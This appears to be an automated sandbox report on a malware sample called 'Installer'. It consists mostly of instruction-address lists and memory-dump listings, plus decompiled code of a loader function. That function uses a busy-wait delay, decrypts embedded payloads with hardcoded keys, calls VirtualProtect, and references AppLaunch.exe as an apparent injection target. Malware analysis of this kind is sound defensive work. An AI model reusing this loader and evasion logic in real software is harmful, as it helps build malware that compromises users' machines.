                                                                                                                                                                    0x00121176
                                                                                                                                                                    0x0012117a
                                                                                                                                                                    0x00121413
                                                                                                                                                                    0x00121419
                                                                                                                                                                    0x00121419
                                                                                                                                                                    0x00121188
                                                                                                                                                                    0x0012118b
                                                                                                                                                                    0x001211a7
                                                                                                                                                                    0x001211a7
                                                                                                                                                                    0x001211a9
                                                                                                                                                                    0x001211b3
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00121193
                                                                                                                                                                    0x00121193
                                                                                                                                                                    0x00121195
                                                                                                                                                                    0x001213b0
                                                                                                                                                                    0x001213b5
                                                                                                                                                                    0x001213ba
                                                                                                                                                                    0x001213bd
                                                                                                                                                                    0x001211c5
                                                                                                                                                                    0x001211cc
                                                                                                                                                                    0x00121440
                                                                                                                                                                    0x00121448
                                                                                                                                                                    0x0012144f
                                                                                                                                                                    0x00121459
                                                                                                                                                                    0x001211d2
                                                                                                                                                                    0x001211d2
                                                                                                                                                                    0x001211d2
                                                                                                                                                                    0x001211e4
                                                                                                                                                                    0x001213dd
                                                                                                                                                                    0x001213dd
                                                                                                                                                                    0x001213e5
                                                                                                                                                                    0x001213ec
                                                                                                                                                                    0x001213f1
                                                                                                                                                                    0x001213fb
                                                                                                                                                                    0x001213fd
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x001211ea
                                                                                                                                                                    0x001211ea
                                                                                                                                                                    0x001211ec
                                                                                                                                                                    0x00121403
                                                                                                                                                                    0x00121403
                                                                                                                                                                    0x00121403
                                                                                                                                                                    0x00121403
                                                                                                                                                                    0x00121403
                                                                                                                                                                    0x001211f2
                                                                                                                                                                    0x001211f2
                                                                                                                                                                    0x001211f9
                                                                                                                                                                    0x001211fb
                                                                                                                                                                    0x00121203
                                                                                                                                                                    0x0012120b
                                                                                                                                                                    0x00121212
                                                                                                                                                                    0x00121214
                                                                                                                                                                    0x00121214
                                                                                                                                                                    0x00121217
                                                                                                                                                                    0x0012121c
                                                                                                                                                                    0x00121223
                                                                                                                                                                    0x00121229
                                                                                                                                                                    0x0012122c
                                                                                                                                                                    0x00121231
                                                                                                                                                                    0x0012123d
                                                                                                                                                                    0x00121242
                                                                                                                                                                    0x0012124c
                                                                                                                                                                    0x00121251
                                                                                                                                                                    0x00121253
                                                                                                                                                                    0x00121257
                                                                                                                                                                    0x00121271
                                                                                                                                                                    0x00121271
                                                                                                                                                                    0x00121271
                                                                                                                                                                    0x00121274
                                                                                                                                                                    0x00121277
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00121279
                                                                                                                                                                    0x0012127e
                                                                                                                                                                    0x00121281
                                                                                                                                                                    0x0012126e
                                                                                                                                                                    0x0012126e
                                                                                                                                                                    0x0012126e
                                                                                                                                                                    0x00121271
                                                                                                                                                                    0x00121271
                                                                                                                                                                    0x00121274
                                                                                                                                                                    0x00121277
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00121260
                                                                                                                                                                    0x00121260
                                                                                                                                                                    0x00121262
                                                                                                                                                                    0x00121290
                                                                                                                                                                    0x00121290
                                                                                                                                                                    0x00121292
                                                                                                                                                                    0x001212a5
                                                                                                                                                                    0x001212a5
                                                                                                                                                                    0x001212a5
                                                                                                                                                                    0x001212a8
                                                                                                                                                                    0x001212ab
                                                                                                                                                                    0x001212ad
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x001212a0
                                                                                                                                                                    0x001212a0
                                                                                                                                                                    0x001212a3
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x001212a3
                                                                                                                                                                    0x001212af
                                                                                                                                                                    0x001212af
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x001212af
                                                                                                                                                                    0x00121294
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00121294
                                                                                                                                                                    0x00121264
                                                                                                                                                                    0x00121264
                                                                                                                                                                    0x00121267
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00121269
                                                                                                                                                                    0x00121269
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00121269
                                                                                                                                                                    0x00121259
                                                                                                                                                                    0x00121259
                                                                                                                                                                    0x001212b4
                                                                                                                                                                    0x001212bc
                                                                                                                                                                    0x001212be
                                                                                                                                                                    0x001212c7
                                                                                                                                                                    0x001212c9
                                                                                                                                                                    0x001212c9
                                                                                                                                                                    0x001212cd
                                                                                                                                                                    0x001212cd
                                                                                                                                                                    0x001212d2
                                                                                                                                                                    0x001212d8
                                                                                                                                                                    0x001212df
                                                                                                                                                                    0x001212e2
                                                                                                                                                                    0x001212e7
                                                                                                                                                                    0x001212ed
                                                                                                                                                                    0x001212f2
                                                                                                                                                                    0x00121463
                                                                                                                                                                    0x00121463
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x001212f8
                                                                                                                                                                    0x001212f8
                                                                                                                                                                    0x001212f8
                                                                                                                                                                    0x001212fa
                                                                                                                                                                    0x001212fa
                                                                                                                                                                    0x001212fd
                                                                                                                                                                    0x001212ff
                                                                                                                                                                    0x00121304
                                                                                                                                                                    0x00121310
                                                                                                                                                                    0x00121310
                                                                                                                                                                    0x00121310
                                                                                                                                                                    0x00121312
                                                                                                                                                                    0x00121315
                                                                                                                                                                    0x00121318
                                                                                                                                                                    0x00121320
                                                                                                                                                                    0x00121320
                                                                                                                                                                    0x00121323
                                                                                                                                                                    0x00121326
                                                                                                                                                                    0x0012132b
                                                                                                                                                                    0x00121331
                                                                                                                                                                    0x00121335
                                                                                                                                                                    0x00121339
                                                                                                                                                                    0x0012133c
                                                                                                                                                                    0x00121341
                                                                                                                                                                    0x00121349
                                                                                                                                                                    0x00121349
                                                                                                                                                                    0x0012134c
                                                                                                                                                                    0x0012134c
                                                                                                                                                                    0x00121355
                                                                                                                                                                    0x0012135a
                                                                                                                                                                    0x0012135f
                                                                                                                                                                    0x00121364
                                                                                                                                                                    0x0012136a
                                                                                                                                                                    0x0012136c
                                                                                                                                                                    0x00121375
                                                                                                                                                                    0x0012137e
                                                                                                                                                                    0x00121381
                                                                                                                                                                    0x0012138c
                                                                                                                                                                    0x00121393
                                                                                                                                                                    0x0012146b
                                                                                                                                                                    0x0012146b
                                                                                                                                                                    0x0012146e
                                                                                                                                                                    0x00121480
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00121480
                                                                                                                                                                    0x00121399
                                                                                                                                                                    0x001213a1
                                                                                                                                                                    0x00121421
                                                                                                                                                                    0x00121436
                                                                                                                                                                    0x001213a3
                                                                                                                                                                    0x001213ae
                                                                                                                                                                    0x001213ae
                                                                                                                                                                    0x001213a1
                                                                                                                                                                    0x001212f2
                                                                                                                                                                    0x00121257
                                                                                                                                                                    0x001211e4
                                                                                                                                                                    0x001213c3
                                                                                                                                                                    0x001213c3
                                                                                                                                                                    0x001213ca
                                                                                                                                                                    0x001213d4
                                                                                                                                                                    0x001213d7
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x001213d7
                                                                                                                                                                    0x0012119b
                                                                                                                                                                    0x001211a2
                                                                                                                                                                    0x001211a4
                                                                                                                                                                    0x001211a4
                                                                                                                                                                    0x001211b5
                                                                                                                                                                    0x001211ba
                                                                                                                                                                    0x001211bf
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x001211bf

                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.304915609.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.304906143.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.304937444.0000000000123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.304942769.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305120624.0000000000152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.0000000000155000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.0000000000157000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.000000000015B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305154315.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305160103.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305172976.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000164000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.000000000019F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000202000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000204000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000229000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306047748.000000000022D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306067690.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306080099.0000000000239000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306494076.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306511138.00000000002EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306605590.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306611664.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306631116.0000000000356000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_120000_Installer.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1672962128-0
                                                                                                                                                                    • Opcode ID: f04fc5062d58f5cf7992ac93ff83c9aa941f9c3cc6bb965a96bc1dfe9dd9b81b
                                                                                                                                                                    • Instruction ID: 115c63d51d8ed0f5f72426d463167dcf4292b75f17bdc6f27dfda3b59689045f
                                                                                                                                                                    • Opcode Fuzzy Hash: f04fc5062d58f5cf7992ac93ff83c9aa941f9c3cc6bb965a96bc1dfe9dd9b81b
                                                                                                                                                                    • Instruction Fuzzy Hash: CF81CDB1A04360EFDB21DFA4E98136EBBF1FB64305F104829E945CB791D73599A4CB82
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 001216AB Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 157memoryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 75 1216ab-1216d4 76 12176e-121772 75->76 77 121778-1217a9 76->77 78 1216d9-12176a 76->78 80 12184e-121852 77->80 78->76 81 121858-1218d0 VirtualProtect 80->81 82 1217ae-12184a 80->82 82->80
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00121A17), ref: 001218C0
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.304915609.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.304906143.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.304937444.0000000000123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.304942769.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305120624.0000000000152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.0000000000155000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.0000000000157000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.000000000015B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305154315.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305160103.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305172976.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000164000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.000000000019F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000202000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000204000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000229000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306047748.000000000022D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306067690.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306080099.0000000000239000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306494076.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306511138.00000000002EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306605590.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306611664.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306631116.0000000000356000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_120000_Installer.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                    • String ID: @$CGs45t8$S$Y$o
                                                                                                                                                                    • API String ID: 544645111-3756165427
                                                                                                                                                                    • Opcode ID: 49480c5173f3c07bd6c70240403004199505f17022132115df65e0ad4d4a4949
                                                                                                                                                                    • Instruction ID: f1f343ff02c7b28afcf037d1ad6f04a2c7937bb7c427fb60e6569df408b08561
                                                                                                                                                                    • Opcode Fuzzy Hash: 49480c5173f3c07bd6c70240403004199505f17022132115df65e0ad4d4a4949
                                                                                                                                                                    • Instruction Fuzzy Hash: B9710D70E092DE8EDF01CBFDD4456EFFFF29F46244F084596D4A4A6252D2798608CB62
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0012190B Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 103COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                    			E0012190B(void* __eflags, char _a4) {
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				char* _v24;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				void _v176716;
				char _v178634;
				void* __ebx;
				intOrPtr _t55;
				void* _t56;
				intOrPtr _t66;
				long _t77;
				void* _t97;

				_t2 =  &_a4 - 4; // 0x585
				_push( *_t2);
				E001229C0(0x2b9c8,  &_a4);
				E00121B40();
				_v24 = 4;
				IsProcessorFeaturePresent(_t77);
				_v44 = L"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe";
				FreeConsole(); // executed
				_v36 = 0;
				_v40 = 0;
				_v36 = 0;
				while(_v36 <= 0x5f5e0ff) {
					_v40 = _v40 + 1;
					_v36 = _v36 + 1;
				}
				if(_v40 != 0x5f5e100) {
					_t55 = 0;
				} else {
					_t56 =  &_v178634;
					 *_t56 =  *0x124154;
					 *((intOrPtr*)(_t56 + 0x77a)) =  *0x001248CE;
					_t97 = _t56 + 0x00000004 & 0xfffffffc;
					_t57 = _t56 - _t97;
					memcpy(_t97, 0x124154, (0x0000077e + _t56 - _t97 & 0xfffffffc) >> 2 << 2);
					memcpy( &_v176716, 0x1248d4, 0x2b200);
					 *((intOrPtr*)( *0x152224))();
					_v48 = 0;
					_v52 = 0;
					_v56 = 0x63e2cb;
					_v60 =  *0x14fad8;
					_v64 = 0;
					_t66 = E001216AB( &_v178634, 0x77e); // executed
					_v72 = _t66;
					_v68 = 0x1248d4;
					E0012162F(0x124154 - _t57, "4QgFZqZSgUTltzHJe3lDyY3N217iiBXiVVTwhWhBkVvMRshiXOZZ8l0sfee7JjUv3",  &_v178634, 0x77e, 0x42);
					_v76 = E001218D1();
					_v12 = 0x42;
					E00121590(0x124154 - _t57, "3ykz7ZN6yU6I9oGA7GS9QnJkBnaha81XGykjYnI9j7AP3i9R2UnwrKCGQiqXCVZ9O",  &_v176716, 0x2b200);
					_v16 =  &_v176716;
					_v20 = 0;
					_v24 = _v44;
					 *((intOrPtr*)(_v76 +  &_v178634))();
					_t55 = 0;
				}
				return _t55;
			}


























                                                                                                                                                                    0x00121912
                                                                                                                                                                    0x00121912
                                                                                                                                                                    0x00121921
                                                                                                                                                                    0x00121928
                                                                                                                                                                    0x0012192d
                                                                                                                                                                    0x00121934
                                                                                                                                                                    0x0012193c
                                                                                                                                                                    0x00121948
                                                                                                                                                                    0x0012194a
                                                                                                                                                                    0x00121951
                                                                                                                                                                    0x00121958
                                                                                                                                                                    0x00121969
                                                                                                                                                                    0x00121961
                                                                                                                                                                    0x00121965
                                                                                                                                                                    0x00121965
                                                                                                                                                                    0x00121979
                                                                                                                                                                    0x00121a9f
                                                                                                                                                                    0x0012197f
                                                                                                                                                                    0x0012197f
                                                                                                                                                                    0x00121991
                                                                                                                                                                    0x00121997
                                                                                                                                                                    0x0012199e
                                                                                                                                                                    0x001219a1
                                                                                                                                                                    0x001219b3
                                                                                                                                                                    0x001219d0
                                                                                                                                                                    0x001219da
                                                                                                                                                                    0x001219dc
                                                                                                                                                                    0x001219e3
                                                                                                                                                                    0x001219ea
                                                                                                                                                                    0x001219f7
                                                                                                                                                                    0x001219fa
                                                                                                                                                                    0x00121a12
                                                                                                                                                                    0x00121a17
                                                                                                                                                                    0x00121a1a
                                                                                                                                                                    0x00121a3e
                                                                                                                                                                    0x00121a48
                                                                                                                                                                    0x00121a4b
                                                                                                                                                                    0x00121a6c
                                                                                                                                                                    0x00121a84
                                                                                                                                                                    0x00121a88
                                                                                                                                                                    0x00121a93
                                                                                                                                                                    0x00121a96
                                                                                                                                                                    0x00121a98
                                                                                                                                                                    0x00121a98
                                                                                                                                                                    0x00121aaf

                                                                                                                                                                    APIs
                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00121386,-00000004,00000001,?,?,00000585,00121386), ref: 00121934
                                                                                                                                                                    • FreeConsole.KERNELBASE ref: 00121948
                                                                                                                                                                    • memcpy.MSVCRT ref: 001219D0
                                                                                                                                                                    Strings
                                                                                                                                                                    • 4QgFZqZSgUTltzHJe3lDyY3N217iiBXiVVTwhWhBkVvMRshiXOZZ8l0sfee7JjUv3, xrefs: 00121A37
                                                                                                                                                                    • 3ykz7ZN6yU6I9oGA7GS9QnJkBnaha81XGykjYnI9j7AP3i9R2UnwrKCGQiqXCVZ9O, xrefs: 00121A65
                                                                                                                                                                    • B, xrefs: 00121A4B
                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe, xrefs: 0012193C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.304915609.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.304906143.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.304937444.0000000000123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.304942769.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305120624.0000000000152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.0000000000155000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.0000000000157000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.000000000015B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305154315.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305160103.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305172976.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000164000.00000080.00000001.01000000.00000003.sdmpDownload File
